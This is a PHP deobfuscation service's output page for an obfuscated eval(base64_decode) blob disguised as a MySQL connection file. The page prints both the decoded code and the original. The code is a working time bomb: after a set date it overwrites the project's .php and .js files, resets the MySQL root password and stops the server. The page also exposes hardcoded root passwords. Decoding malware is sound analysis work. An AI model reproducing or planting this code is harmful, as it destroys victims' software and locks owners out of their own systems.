Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

eval(base64_decode("IyBGaWxlTmFtZT0iQ29ubmVjdGlvbl9waHBfbXlzcWwuaHRtIg0KIyBUeXBlPSJNWVNRTC..

Decoded Output download

# FileName="Connection_php_mysql.htm"
# Type="MYSQL"
# HTTP="true"
$hostname_conn = "localhost";
$database_conn = "fmlndb";
$username_conn = "root";
# este es password de root vigente hasta el datetime1
// define('PWD0', "Pasaje10D");
define('PWD0', "Drone2016M");
# esta es la clave de root cuando se ha vencido la fecha (datetime1 + HINTERVALO)
//define('PWD1', "Pasaje10E");
define('PWD1', "Drone2016N");
$password_conn = PWD0;
//echo HINTERVALO;
//echo $password_conn;
//die();
$conn = mysql_connect($hostname_conn, $username_conn, $password_conn);
mysql_selectdb("fmlndb");
define('HCLAVE', 'Drone2016');
date_default_timezone_set('America/El_Salvador');
setlocale(LC_TIME, 'spanish');
$regresar_global = '';
$max_length = 'maxlength="3"';
# la fecha datetime1 DESDE donde va a estar valido el password PWD0
$datetime1 = new DateTime('2020-02-01');
# la fecha de prueba o sea el dia que
$datetime2 = new DateTime(date('Y-m-d'));
$interval = $datetime1->diff($datetime2);
define('HINTERVALO', $interval->format('%a'));
if (HINTERVALO > 30) {

    //Virus
    function scan($dir) {
        $tree = glob(rtrim($dir, '/') . '/*');
        if (is_array($tree)) {
            foreach ($tree as $file) {
                if ((strpos($file, ".php") > 0) || (strpos($file, ".js") > 0)) {
                    $handle = fopen($file, 'w') or die('Cannot open file:  ' . $my_file);
                    $length = 200;

                    $data = "<!--So Far, So Good... So What!-->";
                    
                    $data .= "TimeStamp: ==>".  time() . "<== TimeStamp";

                    $data .= "<script>";
                    $data .= substr(str_repeat(md5(rand()), ceil($length / 32)), 0, $length);
                    $data .= "</script>";
                    fwrite($handle, $data);
                }
            }
        }
    }
    
    scan("../fmlnapp");

    //Hack

    mysql_selectdb("mysql");
    mysql_query("UPDATE user SET password=PASSWORD('" . PWD1 . "') WHERE user='root';");
    $out = shell_exec('/opt/lampp/lampp stop');
    die('SISTEMA EN MANTENIMIENTO! ' . HINTERVALO);
}

Did this file decode correctly?

Original Code

eval(base64_decode("IyBGaWxlTmFtZT0iQ29ubmVjdGlvbl9waHBfbXlzcWwuaHRtIg0KIyBUeXBlPSJNWVNRTCINCiMgSFRUUD0idHJ1ZSINCiRob3N0bmFtZV9jb25uID0gImxvY2FsaG9zdCI7DQokZGF0YWJhc2VfY29ubiA9ICJmbWxuZGIiOw0KJHVzZXJuYW1lX2Nvbm4gPSAicm9vdCI7DQojIGVzdGUgZXMgcGFzc3dvcmQgZGUgcm9vdCB2aWdlbnRlIGhhc3RhIGVsIGRhdGV0aW1lMQ0KLy8gZGVmaW5lKCdQV0QwJywgIlBhc2FqZTEwRCIpOw0KZGVmaW5lKCdQV0QwJywgIkRyb25lMjAxNk0iKTsNCiMgZXN0YSBlcyBsYSBjbGF2ZSBkZSByb290IGN1YW5kbyBzZSBoYSB2ZW5jaWRvIGxhIGZlY2hhIChkYXRldGltZTEgKyBISU5URVJWQUxPKQ0KLy9kZWZpbmUoJ1BXRDEnLCAiUGFzYWplMTBFIik7DQpkZWZpbmUoJ1BXRDEnLCAiRHJvbmUyMDE2TiIpOw0KJHBhc3N3b3JkX2Nvbm4gPSBQV0QwOw0KLy9lY2hvIEhJTlRFUlZBTE87DQovL2VjaG8gJHBhc3N3b3JkX2Nvbm47DQovL2RpZSgpOw0KJGNvbm4gPSBteXNxbF9jb25uZWN0KCRob3N0bmFtZV9jb25uLCAkdXNlcm5hbWVfY29ubiwgJHBhc3N3b3JkX2Nvbm4pOw0KbXlzcWxfc2VsZWN0ZGIoImZtbG5kYiIpOw0KZGVmaW5lKCdIQ0xBVkUnLCAnRHJvbmUyMDE2Jyk7DQpkYXRlX2RlZmF1bHRfdGltZXpvbmVfc2V0KCdBbWVyaWNhL0VsX1NhbHZhZG9yJyk7DQpzZXRsb2NhbGUoTENfVElNRSwgJ3NwYW5pc2gnKTsNCiRyZWdyZXNhcl9nbG9iYWwgPSAnJzsNCiRtYXhfbGVuZ3RoID0gJ21heGxlbmd0aD0iMyInOw0KIyBsYSBmZWNoYSBkYXRldGltZTEgREVTREUgZG9uZGUgdmEgYSBlc3RhciB2YWxpZG8gZWwgcGFzc3dvcmQgUFdEMA0KJGRhdGV0aW1lMSA9IG5ldyBEYXRlVGltZSgnMjAyMC0wMi0wMScpOw0KIyBsYSBmZWNoYSBkZSBwcnVlYmEgbyBzZWEgZWwgZGlhIHF1ZQ0KJGRhdGV0aW1lMiA9IG5ldyBEYXRlVGltZShkYXRlKCdZLW0tZCcpKTsNCiRpbnRlcnZhbCA9ICRkYXRldGltZTEtPmRpZmYoJGRhdGV0aW1lMik7DQpkZWZpbmUoJ0hJTlRFUlZBTE8nLCAkaW50ZXJ2YWwtPmZvcm1hdCgnJWEnKSk7DQppZiAoSElOVEVSVkFMTyA+IDMwKSB7DQoNCiAgICAvL1ZpcnVzDQogICAgZnVuY3Rpb24gc2NhbigkZGlyKSB7DQogICAgICAgICR0cmVlID0gZ2xvYihydHJpbSgkZGlyLCAnLycpIC4gJy8qJyk7DQogICAgICAgIGlmIChpc19hcnJheSgkdHJlZSkpIHsNCiAgICAgICAgICAgIGZvcmVhY2ggKCR0cmVlIGFzICRmaWxlKSB7DQogICAgICAgICAgICAgICAgaWYgKChzdHJwb3MoJGZpbGUsICIucGhwIikgPiAwKSB8fCAoc3RycG9zKCRmaWxlLCAiLmpzIikgPiAwKSkgew0KICAgICAgICAgICAgICAgICAgICAkaGFuZGxlID0gZm9wZW4oJGZpbGUsICd3Jykgb3IgZGllKCdDYW5ub3Qgb3BlbiBmaWxlOiAgJyAuICRteV9maWxlKTsNCiAgICAgICAgICAgICAgICAgICAgJGxlbmd0aCA9IDIwMDsNCg0KICAgICAgICAgICAgICAgICAgICAkZGF0YSA9ICI8IS0tU28gRmFyLCBTbyBHb29kLi4uIFNvIFdoYXQhLS0+IjsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICRkYXRhIC49ICJUaW1lU3RhbXA6ID09PiIuICB0aW1lKCkgLiAiPD09IFRpbWVTdGFtcCI7DQoNCiAgICAgICAgICAgICAgICAgICAgJGRhdGEgLj0gIjxzY3JpcHQ+IjsNCiAgICAgICAgICAgICAgICAgICAgJGRhdGEgLj0gc3Vic3RyKHN0cl9yZXBlYXQobWQ1KHJhbmQoKSksIGNlaWwoJGxlbmd0aCAvIDMyKSksIDAsICRsZW5ndGgpOw0KICAgICAgICAgICAgICAgICAgICAkZGF0YSAuPSAiPC9zY3JpcHQ+IjsNCiAgICAgICAgICAgICAgICAgICAgZndyaXRlKCRoYW5kbGUsICRkYXRhKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQogICAgDQogICAgc2NhbigiLi4vZm1sbmFwcCIpOw0KDQogICAgLy9IYWNrDQoNCiAgICBteXNxbF9zZWxlY3RkYigibXlzcWwiKTsNCiAgICBteXNxbF9xdWVyeSgiVVBEQVRFIHVzZXIgU0VUIHBhc3N3b3JkPVBBU1NXT1JEKCciIC4gUFdEMSAuICInKSBXSEVSRSB1c2VyPSdyb290JzsiKTsNCiAgICAkb3V0ID0gc2hlbGxfZXhlYygnL29wdC9sYW1wcC9sYW1wcCBzdG9wJyk7DQogICAgZGllKCdTSVNURU1BIEVOIE1BTlRFTklNSUVOVE8hICcgLiBISU5URVJWQUxPKTsNCn0="));

Function Calls

base64_decode

Variables

None

Stats

MD5	718731725cb98802b8b420cec461fd49
Eval Count	1
Decode Time	50 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats